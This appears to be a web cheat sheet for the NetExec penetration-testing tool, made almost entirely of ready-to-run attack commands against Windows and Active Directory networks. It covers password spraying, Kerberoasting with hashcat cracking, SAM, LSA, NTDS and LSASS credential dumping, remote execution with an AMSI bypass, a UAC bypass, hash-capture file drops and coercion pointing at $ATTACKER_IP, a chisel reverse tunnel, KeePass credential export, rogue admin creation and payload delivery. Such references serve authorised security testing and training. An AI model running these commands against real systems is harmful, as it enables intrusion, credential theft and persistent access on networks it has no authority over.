
NetExec Cheatsheet

NetExec commands, protocols, options and modules

Installation
# Install nxc via pipx (recommended)
$ pipx install netexec
# Install nxc from source
$ git clone https://github.com/Pennyw0rth/NetExec && cd NetExec && pipx install .
General Usage
# Scan a single target
$ nxc $PROTOCOL $IP
# Scan multiple targets inline
$ nxc $PROTOCOL $IP1 $IP2 $IP3
# Scan a subnet
$ nxc $PROTOCOL $IP/24
# Scan targets from a file
$ nxc $PROTOCOL targets.txt
# Scan a hostname or FQDN
$ nxc $PROTOCOL $FQDN
# Get help for a specific protocol
$ nxc $PROTOCOL --help
# List available modules for a protocol
$ nxc $PROTOCOL -L
# Show options for a specific module
$ nxc $PROTOCOL -M $MODULE --options
# Export results to a file
$ nxc $PROTOCOL $IP [options] --export $(pwd)/export.txt
# Set thread count for concurrent scanning
$ nxc $PROTOCOL $IP/24 -t $THREADS
Authentication
# Authenticate with domain username and password
$ nxc $PROTOCOL $IP -u $USER -p $PASSWORD -d $DOMAIN
# Authenticate with a local account (non-domain)
$ nxc $PROTOCOL $IP -u $USER -p $PASSWORD --local-auth
# Authenticate with NTLM hash (Pass-the-Hash)
$ nxc $PROTOCOL $IP -u $USER -H $NTLM_HASH
# Authenticate with AES key (Pass-the-Key / Kerberos)
$ nxc $PROTOCOL $IP -u $USER --aesKey $AES_KEY
# Authenticate using Kerberos ccache ticket from KRB5CCNAME
$ nxc $PROTOCOL $IP -u $USER --use-kcache
# Authenticate with Kerberos and specify KDC host
$ nxc $PROTOCOL $DC_FQDN -u $USER -p $PASSWORD -k --kdcHost $DC_FQDN
# Set per-user failure limit to avoid lockouts
$ nxc $PROTOCOL $IP -u users.txt -p passwords.txt --ufail-limit 2
Credential Spraying
# Spray one password against a list of users
$ nxc smb $IP -u users.txt -p $PASSWORD -d $DOMAIN
# Spray multiple users inline with one password
$ nxc smb $IP -u $USER1 $USER2 $USER3 -p $PASSWORD
# Spray a user list against a password list (full bruteforce: every user against every password; check the lockout threshold with --pass-pol first)
$ nxc smb $IP -u users.txt -p passwords.txt
# Pair users with passwords 1:1 (no bruteforce)
$ nxc smb $IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
# Continue spraying after a valid credential is found
$ nxc smb $IP -u users.txt -p $PASSWORD --continue-on-success
# Spray local accounts
$ nxc smb $IP -u $USER -p $PASSWORD --local-auth
# Check bad password count to assess lockout risk
$ nxc smb $IP -u $USER -p $PASSWORD --users
# LDAP password spray (FQDN required, not IP)
$ nxc ldap $DC_FQDN -u users.txt -p $PASSWORD
# MSSQL spray with domain credentials
$ nxc mssql $IP -u users.txt -p $PASSWORD -d $DOMAIN
# MSSQL spray with local Windows accounts
$ nxc mssql $IP -u users.txt -p $PASSWORD -d .
# MSSQL spray with SQL accounts
$ nxc mssql $IP -u users.txt -p $PASSWORD --local-auth
# WinRM spray
$ nxc winrm $IP -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
# Change an expired password (STATUS_PASSWORD_MUST_CHANGE)
$ smbpasswd -r $IP -U $USER
SMB Reconnaissance
# Basic SMB scan - get OS info, signing, domain membership
$ nxc smb $IP/24
# Generate list of hosts with SMB signing disabled (relay targets)
$ nxc smb $IP/24 --gen-relay-list relay_targets.txt
# Enumerate password policy via null session
$ nxc smb $IP -u '' -p '' --pass-pol
# Export password policy to a file (written in JSON format)
$ nxc smb $IP -u '' -p '' --pass-pol --export $(pwd)/passpol.txt
# Enumerate domain users via null session
$ nxc smb $IP -u '' -p '' --users
# Enumerate domain users with valid credentials
$ nxc smb $IP -u $USER -p $PASSWORD --users
# Enumerate shares via null session
$ nxc smb $IP -u '' -p '' --shares
# Enumerate shares with guest account
$ nxc smb $IP -u guest -p '' --shares
# Enumerate shares with valid credentials
$ nxc smb $IP -u $USER -p $PASSWORD --shares
# Enumerate sessions on target
$ nxc smb $IP -u $USER -p $PASSWORD --sessions
# Enumerate logged-on users on target
$ nxc smb $IP -u $USER -p $PASSWORD --loggedon-users
# Filter logged-on users by name or regex
$ nxc smb $IP -u $USER -p $PASSWORD --loggedon-users --loggedon-users-filter $FILTER
# Enumerate domain computers (performs LDAP request internally)
$ nxc smb $IP -u $USER -p $PASSWORD --computers
# Enumerate local groups (append a group name to list that group's members)
$ nxc smb $IP -u $USER -p $PASSWORD --local-groups
# Enumerate domain groups
$ nxc smb $IP -u $USER -p $PASSWORD --groups
# Enumerate members of a specific domain group
$ nxc smb $IP -u $USER -p $PASSWORD --groups "$GROUP_NAME"
# Enumerate disks on target
$ nxc smb $IP -u $USER -p $PASSWORD --disks
# Brute-force RIDs to enumerate users and groups (default up to RID 4000)
$ nxc smb $IP -u $USER -p $PASSWORD --rid-brute
# Brute-force RIDs with a custom maximum RID
$ nxc smb $IP -u $USER -p $PASSWORD --rid-brute $MAX_RID
# Issue a WMI query (default namespace: root\cimv2)
$ nxc smb $IP -u $USER -p $PASSWORD --wmi "$WMI_QUERY"
# Issue a WMI query against a custom namespace
$ nxc smb $IP -u $USER -p $PASSWORD --wmi "$WMI_QUERY" --wmi-namespace "$WMI_NAMESPACE"
LDAP Enumeration
# Enumerate domain users via LDAP
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --users
# Enumerate domain groups via LDAP
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --groups
# Find accounts with PASSWD_NOTREQD flag (may have empty or short passwords)
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --password-not-required
# Find accounts trusted for unconstrained Kerberos delegation
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --trusted-for-delegation
# Find accounts with adminCount=1 (protected privileged accounts)
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --admin-count
# Get the domain SID
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --get-sid
# Enumerate gMSA (Group Managed Service Account) passwords
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --gmsa
# Retrieve LAPS passwords for managed computers
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M laps
# Check if LDAP signing and channel binding are required
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M ldap-checker
# Get Machine Account Quota (how many computer accounts a regular user may add to the domain)
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M MAQ
# Enumerate AD Certificate Services enrollment servers and templates
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M adcs
# Read user descriptions (may contain passwords) with default keywords
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M user-desc
# Read user descriptions using custom keywords
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M user-desc -o KEYWORDS=$KW1,$KW2
# Read DACLs on a specific AD object
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M daclread -o TARGET=$TARGET_USER
# Enumerate AD subnet and site information
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M subnets
# Collect all network info from LDAP
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M get-network -o ALL=true
Kerberos Attacks
# ASREPRoast without credentials using a user list
$ nxc ldap $DC_FQDN -u users.txt -p '' --asreproast asreproast.out
# ASREPRoast all vulnerable accounts with valid credentials
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --asreproast asreproast.out
# Crack ASREPRoast hashes with hashcat
$ hashcat -m 18200 asreproast.out /usr/share/wordlists/rockyou.txt
# Kerberoast all SPN accounts with valid credentials
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD --kerberoasting kerberoast.out
# Crack Kerberoast hashes with hashcat
$ hashcat -m 13100 kerberoast.out /usr/share/wordlists/rockyou.txt
# Authenticate using a Kerberos ccache (no password needed)
$ nxc smb $IP --use-kcache
# Authenticate using an AES key
$ nxc smb $IP -u $USER --aesKey $AES_KEY
GPO Credential Hunting
# Find plaintext credentials in Group Policy Preferences (GPP)
$ nxc smb $IP -u $USER -p $PASSWORD -M gpp_password
# Find autologin credentials stored in registry.xml via GPP
$ nxc smb $IP -u $USER -p $PASSWORD -M gpp_autologin
SMB File Operations
# Spider a share for files matching a pattern (e.g. txt)
$ nxc smb $IP -u $USER -p $PASSWORD --spider $SHARE_NAME --pattern $PATTERN
# Spider a share and list all files and directories (regex .)
$ nxc smb $IP -u $USER -p $PASSWORD --spider $SHARE_NAME --regex .
# Spider a share and search file contents with a regex
$ nxc smb $IP -u $USER -p $PASSWORD --spider $SHARE_NAME --content --regex $REGEX
# Spider all shares and dump file listing to JSON (spider_plus module)
$ nxc smb $IP -u $USER -p $PASSWORD -M spider_plus -o EXCLUDE_DIR=IPC$,print$,NETLOGON,SYSVOL
# Download all readable files from shares (spider_plus)
$ nxc smb $IP -u $USER -p $PASSWORD -M spider_plus -o EXCLUDE_DIR=IPC$,print$,NETLOGON,SYSVOL READ_ONLY=false
# Download a file from a share
$ nxc smb $IP -u $USER -p $PASSWORD --share $SHARE_NAME --get-file $REMOTE_FILE $LOCAL_FILE
# Upload a file to a share
$ nxc smb $IP -u $USER -p $PASSWORD --share $SHARE_NAME --put-file $LOCAL_FILE $REMOTE_FILE
Command Execution
# Execute a CMD command via SMB (default: wmiexec -> atexec -> smbexec -> mmcexec)
$ nxc smb $IP -u $USER -p $PASSWORD -x "$CMD"
# Execute a PowerShell command via SMB
$ nxc smb $IP -u $USER -p $PASSWORD -X "$PS_CMD"
# Force a specific execution method (wmiexec, smbexec, atexec, mmcexec)
$ nxc smb $IP -u $USER -p $PASSWORD --exec-method $EXEC_METHOD -x "$CMD"
# Execute a PowerShell command with a custom AMSI bypass
$ nxc smb $IP -u $USER -p $PASSWORD -X "$PS_CMD" --amsi-bypass $AMSI_BYPASS_FILE
# Execute a CMD command via WinRM
$ nxc winrm $IP -u $USER -p $PASSWORD -x "$CMD"
# Execute a PowerShell command via WinRM
$ nxc winrm $IP -u $USER -p $PASSWORD -X "$PS_CMD"
# Execute a command via SSH
$ nxc ssh $IP -u $USER -p $PASSWORD -x "$CMD"
# Execute a command via SSH with a private key
$ nxc ssh $IP -u $USER --key-file $KEY_PATH -p "" -x "$CMD"
# Enable UAC bypass for non-RID-500 local admins (sets LocalAccountTokenFilterPolicy=1)
$ nxc smb $IP -u $USER -p $PASSWORD --local-auth -x "reg add HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM /V LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"
Credential Dumping
# Dump SAM database (local hashes)
$ nxc smb $IP -u $USER -p $PASSWORD --sam
# Dump LSA secrets
$ nxc smb $IP -u $USER -p $PASSWORD --lsa
# Dump NTDS.dit from Domain Controller (requires DA or replication rights)
$ nxc smb $DC_IP -u $USER -p $PASSWORD --ntds
# Dump NTDS for only enabled accounts
$ nxc smb $DC_IP -u $USER -p $PASSWORD --ntds --enabled
# Dump NTDS for a specific user account only
$ nxc smb $DC_IP -u $USER -p $PASSWORD --ntds --user $TARGET_USER
# Dump credentials via lsassy (LSASS dump + pypykatz parse, marks owned in BloodHound)
$ nxc smb $IP -u $USER -p $PASSWORD -M lsassy
# Dump credentials via nanodump (evasive LSASS dump)
$ nxc smb $IP -u $USER -p $PASSWORD -M nanodump
# Dump credentials via procdump (marks owned in BloodHound)
$ nxc smb $IP -u $USER -p $PASSWORD -M procdump
MSSQL
# Authenticate to MSSQL with domain credentials
$ nxc mssql $IP -u $USER -p $PASSWORD -d $DOMAIN
# Authenticate to MSSQL with a SQL account
$ nxc mssql $IP -u $USER -p $PASSWORD --local-auth
# Run a SQL query
$ nxc mssql $IP -u $USER -p $PASSWORD --local-auth -q "$SQL_QUERY"
# Execute a system command via MSSQL (xp_cmdshell; requires sysadmin/DBA privileges)
$ nxc mssql $IP -u $USER -p $PASSWORD --local-auth -x "$CMD"
# Upload a file to target via MSSQL
$ nxc mssql $IP -u $USER -p $PASSWORD --local-auth --put-file $LOCAL_FILE $REMOTE_PATH
# Download a file from target via MSSQL
$ nxc mssql $IP -u $USER -p $PASSWORD --local-auth --get-file $REMOTE_PATH $LOCAL_FILE
# Enumerate and escalate MSSQL privileges (EXECUTE AS LOGIN / db_owner)
$ nxc mssql $IP -u $USER -p $PASSWORD -M mssql_priv
# Escalate privileges using mssql_priv module
$ nxc mssql $IP -u $USER -p $PASSWORD -M mssql_priv -o ACTION=privesc
# Roll back mssql_priv escalation
$ nxc mssql $IP -u $USER -p $PASSWORD -M mssql_priv -o ACTION=rollback
RDP
# Test RDP credentials across a subnet
$ nxc rdp $IP/24 -u $USER -p $PASSWORD -d $DOMAIN
# Take a screenshot of the NLA-disabled RDP login prompt (no creds needed)
$ nxc rdp $IP --nla-screenshot
# Take a screenshot after successful RDP connection
$ nxc rdp $IP -u $USER -p $PASSWORD --screenshot --screentime $SECONDS --res 1280x720
Hash Stealing & NTLM Relay
# Drop an LNK file on writeable shares to capture NTLMv2 hashes (requires Responder)
$ nxc smb $IP -u $USER -p $PASSWORD -M slinky -o SERVER=$ATTACKER_IP NAME=$FILENAME
# Cleanup slinky LNK files after hash capture
$ nxc smb $IP -u $USER -p $PASSWORD -M slinky -o NAME=$FILENAME CLEANUP=YES
# Drop a searchConnector-ms file to coerce WebDAV/SMB auth (requires ntlmrelayx)
$ nxc smb $IP -u $USER -p $PASSWORD -M drop-sc -o URL=\\\\$ATTACKER_IP\\$SHARE SHARE=$SHARE_NAME FILENAME=$FILENAME
# Cleanup drop-sc files
$ nxc smb $IP -u $USER -p $PASSWORD -M drop-sc -o CLEANUP=True FILENAME=$FILENAME
# Crack captured NTLMv2 hashes with hashcat
$ hashcat -m 5600 ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt
Coercion Attacks
# Coerce authentication via DFSCoerce
$ nxc smb $IP -u $USER -p $PASSWORD -M dfscoerce -o LISTENER=$ATTACKER_IP
# Coerce authentication via ShadowCoerce
$ nxc smb $IP -u $USER -p $PASSWORD -M shadowcoerce -o LISTENER=$ATTACKER_IP
# Check for noPac vulnerability (CVE-2021-42278/42287)
$ nxc smb $IP -u $USER -p $PASSWORD -M nopac
Pivoting with Chisel
# Start chisel reverse SOCKS server on attacker host
$ ./chisel server --reverse
# Upload chisel.exe to compromised Windows host via SMB
$ nxc smb $IP -u $USER -p $PASSWORD --put-file ./chisel.exe \\Windows\\Temp\\chisel.exe
# Start chisel client on compromised host to establish reverse SOCKS tunnel
$ nxc smb $IP -u $USER -p $PASSWORD -x "C:\\Windows\\Temp\\chisel.exe client $ATTACKER_IP:8080 R:socks"
# Start chisel as a server on the Windows target (alternative direction)
$ nxc smb $IP -u $USER -p $PASSWORD -x "C:\\Windows\\Temp\\chisel.exe server --socks5"
# Connect to chisel server running on Windows target from Linux
$ sudo chisel client $IP:8080 socks
# Kill the chisel process on the target when done
$ nxc smb $IP -u $USER -p $PASSWORD -X "Stop-Process -Name chisel -Force"
BloodHound & ADCS
# Collect BloodHound data via LDAP
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M bloodhound
# Mark owned users in BloodHound
$ nxc smb $IP -u $USER -p $PASSWORD -M bh_owned -o BLOODHOUND_HOST=$BH_HOST
# Enumerate AD Certificate Services templates
$ nxc ldap $DC_FQDN -u $USER -p $PASSWORD -M adcs
KeePass
# Discover KeePass processes running on target
$ nxc smb $IP -u $USER -p $PASSWORD -M keepass_discover
# Add a malicious export trigger to KeePass
$ nxc smb $IP -u $USER -p $PASSWORD -M keepass_trigger -o ACTION=ADD
# Restart KeePass to activate the trigger
$ nxc smb $IP -u $USER -p $PASSWORD -M keepass_trigger -o ACTION=RESTART
# Poll for exported KeePass credentials
$ nxc smb $IP -u $USER -p $PASSWORD -M keepass_trigger -o ACTION=POLL
# Cleanup KeePass trigger after extraction
$ nxc smb $IP -u $USER -p $PASSWORD -M keepass_trigger -o ACTION=CLEAN
Misc Modules
# Enable or disable RDP via nxc module
$ nxc smb $IP -u $USER -p $PASSWORD -M rdp -o ACTION=enable
# Resolve additional interface IPs via DCOM (find hidden NICs)
$ nxc smb $IP -u $USER -p $PASSWORD -M ioxidresolver
# Create a local admin account on the target
$ nxc smb $IP -u $USER -p $PASSWORD -M createadmin -o USERNAME=$NEW_USER PASSWORD=$NEW_PASSWORD
# Deliver and execute payload via web_delivery module
$ nxc smb $IP -u $USER -p $PASSWORD -M web_delivery -o URL=$PAYLOAD_URL
# Enumerate AD subnet and site information
$ nxc smb $IP -u $USER -p $PASSWORD -M subnets
IPv6
# Target a host over IPv6
$ nxc smb $IPV6_ADDR -u $USER -p $PASSWORD
Database (nxcdb)
# Open the nxc credential database
$ nxcdb
# Switch to SMB protocol table
$ nxcdb (default) > proto smb
# List stored credentials
$ nxcdb (default)(smb) > creds
# Create a new workspace
$ nxcdb (default) > workspace create $WORKSPACE_NAME
# Switch to a workspace
$ nxcdb (default) > workspace $WORKSPACE_NAME
# List all workspaces
$ nxcdb (default) > workspace list
# Return to default workspace
$ nxcdb (custom) > workspace default